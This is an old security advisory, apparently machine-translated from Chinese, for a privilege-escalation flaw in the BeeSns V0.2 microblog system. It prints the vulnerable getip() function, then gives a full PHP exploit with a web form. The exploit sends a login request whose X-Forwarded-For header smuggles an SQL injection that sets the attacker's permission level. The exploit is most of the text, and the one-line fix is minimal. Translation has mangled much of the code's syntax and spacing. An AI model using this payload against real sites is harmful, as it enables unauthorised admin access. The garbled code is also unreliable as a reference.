BeeSns Weibo system V0.2 Privilege Escalation oday + exp and repair

Release date: 2011-1.27
Author: Zi Yi
Affected Version: BeeSns V0.2
Official Address: http://www.beesns.com/
Vulnerability Description: IP address filtering is lax, which allows users to submit malicious parameters to improve their permissions.

This Weibo system has a good style. I personally like it. Check the code to find some problems. Check the Code directly.

01 // obtain the Client IP Address

02 functiongetip (){

03 if (isset ($ _ SERVER )){

04 if (isset ($ _ SERVER [HTTP_X_FORWARDED_FOR]) {

05 $ realip = $ _ SERVER [HTTP_X_FORWARDED_FOR];

06} elseif (isset ($ _ SERVER [HTTP_CLIENT_IP]) {

07 $ realip = $ _ SERVER [HTTP_CLIENT_IP];

08} else {

09 $ realip = $ _ SERVER [REMOTE_ADDR];

10}

11} else {

12 if (getenv ("HTTP_X_FORWARDED_FOR ")){

13 $ realip = getenv ("HTTP_X_FORWARDED_FOR ");

14} elseif (getenv ("HTTP_CLIENT_IP ")){

15 $ realip = getenv ("HTTP_CLIENT_IP ");

16} else {

17 $ realip = getenv ("REMOTE_ADDR ");

18}

19}

20 $ iphide = explode (".", $ realip );

21

22 $ realip = "$ iphide [0]. $ iphide [1]. $ iphide [2]. $ iphide [3]"; //! I don't understand what the author wrote. The IP address is not filtered and vulnerabilities are generated.

23 return $ realip;

24}

This vulnerability is completely YY. --!

EXP:

 
01 <? Php

02 print_r (

03 + --------------------------------------------------------------------------- + <br>

04 BeeSns v0.2 Getip () Remote SQL Injection Exploit <br>

05 site: www.beesns.com <br>

06 by sub-meter <br>

07 Blog: http://www.zyday.com <br>

08

09 + --------------------------------------------------------------------------- + <br> );

10

11 if (empty ($ _ POST [submit]) {

12} else {

13 error_reporting (7 );

14 ini_set (max_execution_time, 0 );

15 $ host = $ _ POST [host];

16 $ path = $ _ POST [path];

17 $ username = $ _ POST [username];

18 $ password =$ _ POST [password];

19 send ();

20}

21 <! -- More -->

22

23 functionsend ()

24 {

25 global $ host, $ path, $ username, $ password;

26

27 $ cmd = "uId =". $ username. "& uPw =". $ password;

28 $ getinj = "1.1.1.1, permissions = 5 where uid = $ username #";

29 $ data = "POST". $ path. "post. php? Act = userLogin HTTP/1.1 ";

30 $ data. = "Accept :*/*";

31 $ data. = "Accept-Language: zh-cn ";

32 $ data. = "Content-Type: application/x-www-form-urlencoded ";

33 $ data. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";

34 $ data. = "Host: $ host ";

35 $ data. = "Content-Length:". strlen ($ cmd )."";

36 $ data. = "Connection: Close ";

37 $ data. = "X-Forwarded-For: $ getinj ";

38 $ data. = $ cmd;

39

40 $ fp = fsockopen ($ host, 80 );

41 fputs ($ fp, $ data );

42

43 $ resp =;

44

45 while ($ fp &&! Feof ($ fp ))

46 $ resp. = fread ($ fp, 1024 );

47

48 if (preg_match (# (. *) charset = UTF-8 (. *) 1 (. *) 1 (. *) 0 (. *) # Uis, $ resp )){

49 echo "<br> <font color = green> the permission is successfully upgraded! </Font> ";

50} else {

51 echo "<font color = red> Failed! </Font> ";

52}

53

54}

55?>

56 <form action = method = POST>

57 target address: <input type = inputname = hostvalue = www.zyday.com> * do not add <a href = "http ://

58 level-2 Directory: <input type = inputname = pathvalue =/> * if it is not a level-2 Directory, keep the default value. <br>

59 User name: <input type = inputname = username> * User name applied for on the target site. <font color = red> we recommend that you use a trumpet test. </font> <br>

60 password: <input type = inputname = password> <br>

61 <input type = submitname = submitvalue = Privilege Escalation> <br>

62 </form>

Fix: IP address filtering